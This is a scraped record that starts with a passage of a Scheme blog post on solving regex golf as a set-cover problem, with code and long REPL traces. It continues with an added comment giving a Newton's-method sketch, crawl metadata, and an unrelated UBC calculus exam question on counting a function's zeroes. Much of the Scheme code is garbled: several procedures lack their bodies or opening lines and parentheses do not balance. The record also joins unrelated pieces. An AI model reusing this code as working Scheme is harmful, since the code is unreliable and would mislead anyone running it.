(string-list-matcher losers)))\n(map (lambda (winner)\n(cons winner (dominant-ngrams winner losing-ngram?)))\nwinners)))\n\n(define (cover0 v-k-table)\n(let ((empty-solution-set (list '())))\n\n(let ((value (car v-k-entry))\n(keys (cdr v-k-entry)))\n\n(write-string \"Adding value \") (write value) (newline)\n(write-string \" with keys \") (write keys) (newline)\n(write-string \" to \") (write (length solution-set))\n(write-string \" partial solutions.\") (newline)\n\n(let ((new-solutions\n(map make-new-solution (cartesian-product solution-set keys))))\n\n(write-string \"Returning \") (write (length new-solutions))\n(write-string \" new partial solutions.\") (newline)\n\nnew-solutions)))\n\n(define (lowest-scoring list)\n(least-elements list (lambda (l r) (< (score l) (score r)))))\n\n(define (cartesian-product left-list right-list)\nright-list))\n'()\nleft-list))\n\n(define (make-new-solution cp-term)\n(let ((solution (car cp-term))\n(key (cdr cp-term)))\n\n(define (improper-list-error procedure thing)\n(error (string-append \"Improper list found by \" procedure \": \") thing))\n\n(define (least-elements list <)\n((< item (car answer)) (cons item '()))\n\n(cond ((pair? list) (fold-left accumulate-least\n(cons (car list) '())\n(cdr list)))\n((null? list) (error \"List must have at least one element.\" list))\n(else (improper-list-error 'LEAST-ELEMENTS list))))\n\n(define (score solution)\n(do ((tail solution (cdr tail))\n(score -1 (+ score (string-length (car tail)) 1)))\n((not (pair? tail))\n(if (null? tail)\nscore\n(improper-list-error 'score solution)))))\n```\nThis works for small sets:\n```1 ]=> (mini-golf0 boys girls)\nwith keys (\"ob\" \"c\" \"j\")\nto 1 partial solutions.\nReturning 3 new partial solutions.\nwith keys (\"as\")\nto 3 partial solutions.\nReturning 3 new partial solutions.\nwith keys (\"an\" \"ha\")\nto 3 partial solutions.\nReturning 6 new partial solutions.\nwith keys (\"ah\" \"oa\" \"no\")\nto 6 partial solutions.\nReturning 18 new partial solutions.\nwith keys (\"lia\" \"lli\" \"ill\" \"am\" \"w\")\nto 18 partial solutions.\nReturning 90 new partial solutions.\nwith keys (\"lia\" \"am\")\nto 90 partial solutions.\nReturning 180 new partial solutions.\nwith keys (\"en\" \"de\" \"yd\" \"ay\" \"j\")\nto 180 partial solutions.\nReturning 900 new partial solutions.\nwith keys (\"ae\" \"ha\" \"c\")\nto 900 partial solutions.\nReturning 2700 new partial solutions.\nwith keys (\"de\" \"nd\" \"an\" \"le\" \"al\" \"r\" \"x\")\nto 2700 partial solutions.\nReturning 18900 new partial solutions.\nwith keys (\"en\" \"de\" \"id\")\nto 18900 partial solutions.\nReturning 56700 new partial solutions.\n;Value 41: ((\"de\" \"am\" \"ah\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"ah\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"ah\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"ah\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"ah\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"ah\" \"an\" \"as\" \"c\")\n(\"en\" \"am\" \"ah\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"an\" \"as\" \"c\")\n(\"en\" \"am\" \"oa\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"an\" \"as\" 
\"c\")\n(\"en\" \"am\" \"no\" \"an\" \"as\" \"c\"))\n```\nBut you can see that we won't be able to go much beyond this because there are just too many combinations. We can cut down on the intermediate partial solutions by noticing that many of them are redundant. We don't need to keep partial solutions that cannot possibly lead to a shortest final solution. The various partial solutions each (potentially) match different sets of words. We only need keep the shortest solution for each different set of matched words. Furthermore, if a solution's matches are a superset of another's matches, and the other is the same length or longer, then the solution is dominated by the other and will always be at least the length of the longer.\n```(define (mini-golf1 winners losers)\n(cover1\n(make-dominant-ngram-table winners (delete-losing-superstrings winners losers))\nlowest-scoring))\n\n(define (cover1 v-k-table lowest-scoring)\n(let ((empty-solution-set (list '())))\n\n(let ((value (car v-k-entry))\n(keys (cdr v-k-entry)))\n\n(write-string \"Adding value \") (write value) (newline)\n(write-string \" with keys \") (write keys) (newline)\n(write-string \" to \") (write (length solution-set))\n(write-string \" partial solutions.\") (newline)\n\n(let ((new-solutions\n(map make-new-solution (cartesian-product solution-set keys))))\n\n(let ((trimmed-solutions (trim-partial-solutions new-solutions)))\n\n(write-string \"Returning \") (write (length trimmed-solutions))\n(write-string \" of \") (write (length new-solutions))\n(write-string \" new partial solutions.\") (newline)\n\ntrimmed-solutions))))\n\n(define (trim-partial-solutions partial-solutions)\n(let ((equivalent-solutions (collect-equivalent-partial-solutions partial-solutions)))\n(write-string \" Deleting \")\n(write (- (length partial-solutions) (length equivalent-solutions)))\n(write-string \" equivalent partial solutions.\")\n(newline)\n\n(remove-dominated-solutions\n(map lowest-scoring-equivalent-partial-solution equivalent-solutions))))\n\n(define (lowest-scoring-equivalent-partial-solution entry)\n(first (lowest-scoring (car entry))))\n\n(define (collect-equivalent-partial-solutions alist)\n;; Add each entry in turn.\n(fold-left (lambda (equivalents partial-solution)\npartial-solution\n(partial-solution-matches partial-solution)\nequivalents))\n'() alist))\n\n(define (partial-solution-matches partial-solution)\n(keep-matching-items v-k-table\n(lambda (entry)\n(there-exists? partial-solution\n(lambda (key) (member key (cdr entry)))))))\n\n(define (remove-dominated-solutions partial-solutions)\n(let ((before-length (length partial-solutions)))\n'()\n(map (lambda (partial-solution)\n(cons partial-solution (partial-solution-matches partial-solution)))\npartial-solutions)))))\n(write-string \" Deleting \") (write (- before-length after-length))\n(write-string \" dominated solutions.\")\n(newline)\n\n(lowest-scoring\n\n(define (dominates-solution? solution)\n(let ((partial-solution (car solution))\n(solution-matches (cdr solution)))\n(lambda (other-solution)\n(let ((other-partial-solution (car other-solution))\n(other-matches (cdr other-solution)))\n(and (not (equal? solution-matches other-matches))\n(superset? other-matches solution-matches)\n(<= (score other-partial-solution) (score partial-solution)))))))\n\n(cond ((pair? alist)\n(let ((entry (car alist))\n(tail (cdr alist)))\n(let ((entry-solutions (car entry))\n(entry-value (cdr entry)))\n(if (equal? 
value entry-value)\n(if (member solution entry-solutions)\nalist\n(cons (cons (cons solution entry-solutions) value)\ntail))\n(cons entry (add-equivalent-partial-solution solution value tail))))))\n((null? alist) (list (cons (list solution) value)))\n(else (improper-list-error 'collect-equivalents alist))))\n```\n```1 ]=> (mini-golf1 winners losers)\nwith keys (\"was\" \"to\" \"gt\" \"hi\" \"sh\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 1 dominated solutions.\nReturning 2 of 5 new partial solutions.\nto 2 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 4 of 6 new partial solutions.\nwith keys (\"rs\" \"fe\" \"ff\" \"ef\" \"j\")\nto 4 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 4 dominated solutions.\nReturning 4 of 20 new partial solutions.\nwith keys (\"iso\" \"di\" \"ad\" \"ma\")\nto 4 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 12 of 16 new partial solutions.\nwith keys (\"nro\" \"onr\" \"oe\")\nto 12 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 36 new partial solutions.\nwith keys (\"ks\" \"ac\" \"j\")\nto 12 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 36 new partial solutions.\nwith keys (\"ren\" \"ure\" \"bu\" \"va\" \"-\")\nto 12 partial solutions.\nDeleting 36 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 24 of 60 new partial solutions.\nwith keys (\"iso\" \"ris\" \"rri\" \"arr\" \"har\")\nto 24 partial solutions.\nDeleting 96 equivalent partial solutions.\nRemoving 12 dominated solutions.\nReturning 12 of 120 new partial solutions.\nwith keys (\"olk\" \"po\")\nto 12 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 24 new partial solutions.\nwith keys (\"lo\" \"yl\" \"ta\")\nto 12 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 12 dominated solutions.\nReturning 12 of 36 new partial solutions.\nwith keys (\"ier\" \"pie\" \"ce\" \"rc\")\nto 12 partial solutions.\nDeleting 36 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 48 new partial solutions.\nwith keys (\"na\" \"ch\" \"uc\" \"bu\")\nto 12 partial solutions.\nDeleting 39 equivalent partial solutions.\nRemoving 3 dominated solutions.\nReturning 6 of 48 new partial solutions.\nwith keys (\"inco\" \"col\" \"ln\" \"li\")\nto 6 partial solutions.\nDeleting 15 equivalent partial solutions.\nRemoving 6 dominated solutions.\nReturning 3 of 24 new partial solutions.\nwith keys (\"ant\" \"ra\")\nto 3 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 3 of 6 new partial solutions.\nwith keys (\"hay\" \"ye\")\nto 3 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 3 of 6 new partial solutions.\nwith keys (\"eld\" \"iel\" \"fi\" \"rf\" \"ga\")\nto 3 partial solutions.\nDeleting 9 equivalent partial solutions.\nRemoving 3 dominated solutions.\nReturning 3 of 15 new partial solutions.\nwith keys (\"ela\" \"vel\" \"lev\")\nto 3 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 9 new partial solutions.\nwith keys (\"mck\" \"nl\")\nto 6 partial solutions.\nDeleting 6 equivalent partial solutions.\nRemoving 0 dominated 
solutions.\nReturning 6 of 12 new partial solutions.\nwith keys (\"vel\" \"sev\" \"lt\" \"os\" \"oo\")\nto 6 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 30 new partial solutions.\nwith keys (\"ft\" \"af\" \"ta\")\nto 6 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 18 new partial solutions.\nwith keys (\"ls\")\nto 6 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 6 new partial solutions.\nwith keys (\"ard\" \"har\" \"di\")\nto 6 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 4 of 18 new partial solutions.\nwith keys (\"li\" \"oo\")\nto 4 partial solutions.\nDeleting 4 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 4 of 8 new partial solutions.\nwith keys (\"oo\" \"ho\")\nto 4 partial solutions.\nDeleting 4 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 2 of 8 new partial solutions.\nwith keys (\"ma\" \"ru\" \"tr\")\nto 2 partial solutions.\nDeleting 4 equivalent partial solutions.\nRemoving 1 dominated solutions.\nReturning 1 of 6 new partial solutions.\nwith keys (\"wer\" \"sen\" \"ise\" \"ow\" \"ho\" \"nh\" \"ei\")\nto 1 partial solutions.\nDeleting 6 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 7 new partial solutions.\nwith keys (\"ken\" \"dy\" \"ed\" \"nn\")\nto 1 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 4 new partial solutions.\nwith keys (\"hn\" \"oh\" \"j\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"xo\" \"ix\" \"ni\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"car\" \"rt\")\nto 1 partial solutions.\nDeleting 1 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 2 new partial solutions.\nwith keys (\"ga\" \"ag\" \"ea\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"sh\" \"us\" \"bu\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"int\" \"to\" \"li\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"ma\" \"am\" \"ba\" \"ob\")\nto 1 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 4 new partial solutions.\n;Value 47: ((\"rt\" \"ni\" \"nn\" \"ho\" \"ls\" \"nl\" \"vel\" \"ga\" \"ye\" \"ra\" \"li\" \"rc\" \"ta\" \"po\" \"har\" \"bu\" \"oe\" \"ma\" \"j\" \"ad\" \"sh\"))```\nThe `cover` procedure takes a table that maps values to the keys that cover them. If we can reduce the size of that table without changing the solution, we'll run faster. If there are two entries in the table such that the keys of one are a superset of the keys of the other, we can discard the superset: the smaller of the two entries will be in the solution, and any key that matches the smaller one will automatically match the larger one as well. 
Also, if two values have the same set of keys that match them, we need only include one of the values in the table.\n```(define (delete-dominated-values v-k-table)\n(let ((size-before (length v-k-table)))\n\n(define (dominated-value? entry)\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(there-exists? v-k-table\n(lambda (other-entry)\n(and (not (eq? entry other-entry))\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(and (superset? entry-keylist other-keylist)\n(not (equal? other-keylist entry-keylist)))))))))\n\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(lambda (other-entry)\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(equal? entry-keylist other-keylist))))))\n\n(dominated-value? entry))\n\n(write-string \"Removed \") (write (- size-before (length answer)))\n(write-string \" dominated and equivalent values.\")\n(newline)\n\n(define (superset? bigger smaller)\n(for-all? smaller (lambda (s) (member s bigger))))\n\n(define (mini-golf2 winners losers)\n(cover1\n(delete-dominated-values\n(make-dominant-ngram-table winners (delete-losing-superstrings winners losers)))\nlowest-scoring))\n\n;;;;;;;;\n;; Delete dominated keys from the keylists.\n\n(define (mini-golf3 winners losers)\n(cover1\n(delete-dominated-keys-and-values\n(make-dominant-ngram-table winners (delete-losing-superstrings winners losers))\n(lambda (left right)\n(or (< (string-length left) (string-length right))\n(and (= (string-length left) (string-length right))\n(string<? left right)))))\nlowest-scoring))\n\n(define (delete-dominated-keys-and-values v-k-table better-key)\n(let ((before-size (fold-left * 1 (map length v-k-table))))\n(let ((new-table (delete-dominated-values\n(delete-dominated-keys v-k-table better-key))))\n(let ((after-size (fold-left * 1 (map length new-table))))\n(if (= before-size after-size)\nv-k-table\n(delete-dominated-keys-and-values new-table better-key))))))\n\n(define (delete-dominated-keys v-k-table better-key)\n(let ((all-keys (get-all-keys v-k-table)))\n\n(define (lookup-key key)\n(cons key\n(map car\n(keep-matching-items v-k-table\n(lambda (v-k-entry)\n(member key (cdr v-k-entry)))))))\n\n(let ((k-v-table (map lookup-key all-keys)))\n\n(define (dominated-key? key)\n(let ((values (cdr (assoc key k-v-table))))\n(there-exists? k-v-table\n(lambda (entry)\n(let ((entry-key (car entry))\n(entry-values (cdr entry)))\n(and (superset? entry-values values)\n(not (equal? values entry-values))\n(or (< (string-length entry-key) (string-length key))\n(and (= (string-length entry-key) (string-length key))\n(string<? entry-key key)))))))))\n\n(let ((values (cdr (assoc key k-v-table))))\n(lambda (entry-key)\n(let ((entry-values (cdr (lookup-key entry-key))))\n(equal? values entry-values))))))\n\n(if (or (dominated-key? key)\n\n(let ((good-keys (fold-left add-keys '() (sort all-keys better-key))))\n(write-string \"Removed \") (write (- (length all-keys) (length good-keys)))\n(write-string \" of \") (write (length all-keys)) (write-string \" keys.\")(newline)\n\n(map (lambda (entry)\n(cons (car entry)\n(keep-matching-items (cdr entry) (lambda (key) (member key good-keys)))))\nv-k-table)))))\n\n(define (get-all-keys v-k-table)\n(cdr entry)))\n'()\nv-k-table))```\nTrimming the table this way helps a lot. We can now compute the dogs vs. 
cats.\n```1 ]=> (mini-golf3 dogs cats)\n\nRemoved 294 of 405 keys.\nRemoved 44 dominated and equivalent values.\nRemoved 25 of 93 keys.\nRemoved 15 dominated and equivalent values.\nRemoved 7 of 62 keys.\nRemoved 0 dominated and equivalent values.\nRemoved 0 of 55 keys.\nRemoved 0 dominated and equivalent values.\nwith keys (\"OIS\" \"BOR\" \"RZ\")\nto 1 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 3 of 3 new partial solutions.\nwith keys (\"SCH\" \"HN\")\nto 3 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 6 new partial solutions.\nwith keys (\"JI\")\nto 6 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 6 new partial solutions.\nwith keys (\"TERS\" \"ETT\")\nto 6 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 12 new partial solutions.\nwith keys (\"CHI\")\nto 12 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 12 new partial solutions.\nwith keys (\"S F\" \"DES\" \" DE\" \"IER\" \"FL\" \"VI\")\nto 12 partial solutions.\nDeleting 8 equivalent partial solutions.\nRemoving 8 dominated solutions.\nReturning 56 of 72 new partial solutions.\nwith keys (\"EKI\")\nto 56 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 56 of 56 new partial solutions.\nwith keys (\" MAL\" \"OIS\" \"LG\")\nto 56 partial solutions.\nDeleting 96 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 72 of 168 new partial solutions.\nwith keys (\"TERS\" \"D P\")\nto 72 partial solutions.\nDeleting 108 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 144 new partial solutions.\nwith keys (\"W \")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\"DS\")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\"BOR\" \" DE\" \"GU\")\nto 36 partial solutions.\nDeleting 88 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 18 of 108 new partial solutions.\nwith keys (\"ANS\" \"LM\")\nto 18 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\"LH\")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\" COR\" \"ORS\")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 72 of 72 new partial solutions.\nwith keys (\" MAL\" \"TES\" \"LAS\" \"KA\")\nto 72 partial solutions.\nDeleting 184 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 104 of 288 new partial solutions.\nwith keys (\"IP\")\nto 104 partial solutions.\nDeleting 0 equivalent partial solutions.\n;GC #199: took: 0.20 (1%) CPU time, 0.10 (1%) real time; free: 16754359\nRemoving 0 dominated solutions.\nReturning 104 of 104 new partial solutions.\nwith keys (\"SHI\" \" I\")\nto 104 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 208 of 208 new partial solutions.\nwith keys (\"AK\")\nto 208 partial 
solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 208 of 208 new partial solutions.\nwith keys (\"DES\" \"DG\" \"OD\")\nto 208 partial solutions.\nDeleting 304 equivalent partial solutions.\nRemoving 144 dominated solutions.\nReturning 176 of 624 new partial solutions.\nwith keys (\"S F\" \"FR\")\nto 176 partial solutions.\nDeleting 224 equivalent partial solutions.\nRemoving 16 dominated solutions.\nReturning 112 of 352 new partial solutions.\nwith keys (\"API\")\nto 112 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 112 of 112 new partial solutions.\nwith keys (\"IES\")\nto 112 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 112 of 112 new partial solutions.\nwith keys (\"LAS\" \"IZ\" \"VI\")\nto 112 partial solutions.\n;GC #200: took: 0.10 (0%) CPU time, 0.10 (1%) real time; free: 16757322\nDeleting 272 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 336 new partial solutions.\nwith keys (\"ITT\")\nto 64 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 64 new partial solutions.\nwith keys (\"GS\")\nto 64 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 64 new partial solutions.\nwith keys (\"HAVANE\")\nto 64 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 64 new partial solutions.\nwith keys (\"ANI\" \"LS\")\nto 64 partial solutions.\nDeleting 80 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 48 of 128 new partial solutions.\nwith keys (\"FS\")\nto 48 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 48 of 48 new partial solutions.\nwith keys (\"TES\" \"LT\")\nto 48 partial solutions.\nDeleting 72 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 24 of 96 new partial solutions.\nwith keys (\" COR\" \"LS\")\nto 24 partial solutions.\nDeleting 32 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 16 of 48 new partial solutions.\nwith keys (\"IER\" \" T\")\nto 16 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 4 dominated solutions.\nReturning 4 of 32 new partial solutions.\nwith keys (\"ANS\" \"ANI\")\nto 4 partial solutions.\nDeleting 6 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 2 of 8 new partial solutions.\nwith keys (\"GR\")\nto 2 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 2 of 2 new partial solutions.\nwith keys (\"SCH\" \" PI\")\nto 2 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 4 new partial solutions.\nwith keys (\"SHI\" \" T\")\nto 1 partial solutions.\nDeleting 1 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 2 new partial solutions.\nwith keys (\"EI\")\nto 1 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 1 new partial solutions.\nwith keys (\"DL\" \"OD\")\nto 1 partial solutions.\nDeleting 1 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 2 new partial solutions.\nwith keys (\"OX\")\nto 1 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated 
solutions.\nReturning 1 of 1 new partial solutions." ]
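Two small Scheme sketches to go with the posts above.

First, the digit stream printed by `(gosper-sqrt 0 17 10 0)` is the square root of 17/10: the routine solves (ax + b)/(cx + d) = x, and with a = d = 0 that reduces to x² = b/c. A plain floating-point Newton iteration (the same shape as the blog's `newtons-method`, but with an ordinary 1e-12 tolerance of my choosing instead of the integer cutoff used inside `gosper-sqrt`) reproduces the leading digits:
```
(define (newtons-method f f-prime guess)
  (let ((dy (f guess)))
    (if (< (abs dy) 1e-12)
        guess
        (newtons-method f f-prime (- guess (/ dy (f-prime guess)))))))

;; square root of 17/10, for comparison with the digit stream above
(newtons-method (lambda (x) (- (* x x) 1.7))
                (lambda (x) (* 2 x))
                1.0)
;; => 1.303840481040... (the leading digits of the stream)
```
Second, a couple of the bit-set helpers in the set-cover code above lost their bodies in the formatting. Going by the stray `0`, `lset`, and `(bset-union bset (bset-element->bit universe element))` fragments, `lset->bset` is presumably a fold along these lines (a reconstruction, not the post's verbatim code):
```
(define (lset->bset universe lset)
  (fold-left (lambda (bset element)
               (bset-union bset (bset-element->bit universe element)))
             0
             lset))

;; e.g. with universe (a b c):
;; (bset-superset? (lset->bset '(a b c) '(a b c))
;;                 (lset->bset '(a b c) '(a c)))   => #t
```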
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74696696,"math_prob":0.93043756,"size":33449,"snap":"2022-27-2022-33","text_gpt3_token_len":9371,"char_repetition_ratio":0.3500673,"word_repetition_ratio":0.30507734,"special_character_ratio":0.30123472,"punctuation_ratio":0.10986267,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9925551,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T19:29:37Z\",\"WARC-Record-ID\":\"<urn:uuid:92092e87-48c2-4081-8938-8e5920abb7ba>\",\"Content-Length\":\"175184\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:68387e35-2151-4361-ab6e-a0702472fb3d>\",\"WARC-Concurrent-To\":\"<urn:uuid:f5c12f0b-ac84-4016-8fdc-adff5dbadb28>\",\"WARC-IP-Address\":\"142.251.16.132\",\"WARC-Target-URI\":\"https://funcall.blogspot.com/2014/08/\",\"WARC-Payload-Digest\":\"sha1:MB73OCTHKI7N47R3SYHMUEHYW3EFJTCQ\",\"WARC-Block-Digest\":\"sha1:6ER7YOADPQLBTPRX3G5GRH5QUFTJKOM5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103642979.38_warc_CC-MAIN-20220629180939-20220629210939-00592.warc.gz\"}"}
https://wiki.ubc.ca/Science:Math_Exam_Resources/Courses/MATH100/December_2016/Question_04_(c)
[ "# Science:Math Exam Resources/Courses/MATH100/December 2016/Question 04 (c)\n\nMATH100 December 2016\nOther MATH100 Exams\n\n### Question 04 (c)\n\nLet $f(x)$", null, "be a continuous function defined for all real numbers $x$", null, ".\n\nSuppose $f(x)$", null, "is increasing on the intervals $(-\\infty ,-1)$", null, "and $(3,\\infty )$", null, ", decreasing on $(-1,3)$", null, ", $f(-1)=2$", null, "and $f(3)=1$", null, ".\n\nHow many zeroes does $f(x)$", null, "have?\n\n(i) 0\n\n(ii) 1\n\n(iii) 2\n\n(iv) 3\n\n(v) Cannot determine from the information given.\n\n Make sure you understand the problem fully: What is the question asking you to do? Are there specific conditions or constraints that you should take note of? How will you know if your answer is correct from your work only? Can you rephrase the question in your own words in a way that makes sense to you? If you are stuck, check the hint below. Consider it for a while. Does it give you a new idea on how to approach the problem? If so, try it!\n\n Checking a solution serves two purposes: helping you if, after having used the hint, you still are stuck on the problem; or if you have solved the problem and would like to check your work. If you are stuck on a problem: Read the solution slowly and as soon as you feel you could finish the problem on your own, hide it and work on the problem. Come back later to the solution if you are stuck or if you want to check your work. If you want to check your work: Don't only focus on the answer, problems are mostly marked for the work you do, make sure you understand all the steps that were required to complete the problem and see if you made mistakes or forgot some aspects. Your goal is to check that your mental process was correct, not only the result.", null, "Math Learning Centre A space to study math together. Free math graduate and undergraduate TA support. Mon - Fri: 11 am - 5 pm, Private tutor We can help to" ]
[ null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/202945cce41ecebb6f643f31d119c514bec7a074", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/87f9e315fd7e2ba406057a97300593c4802b53e4", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/202945cce41ecebb6f643f31d119c514bec7a074", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/eecbbaf03fa846f2e0c57bf5f65e760d2f7e484d", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/d6b7cc6628a02aefb227ffb28187b41371d6ac22", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/d9d16379ad1374665a70318fffffa4c02815d901", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/4bcbd3a30f5fce96554fb61098f98023e4b472fe", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/fa5d5faad6da6fee29461116087648839b9196b1", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/202945cce41ecebb6f643f31d119c514bec7a074", null, "https://wiki.ubc.ca/images/thumb/6/60/Bulbgraph.png/25px-Bulbgraph.png", null ]
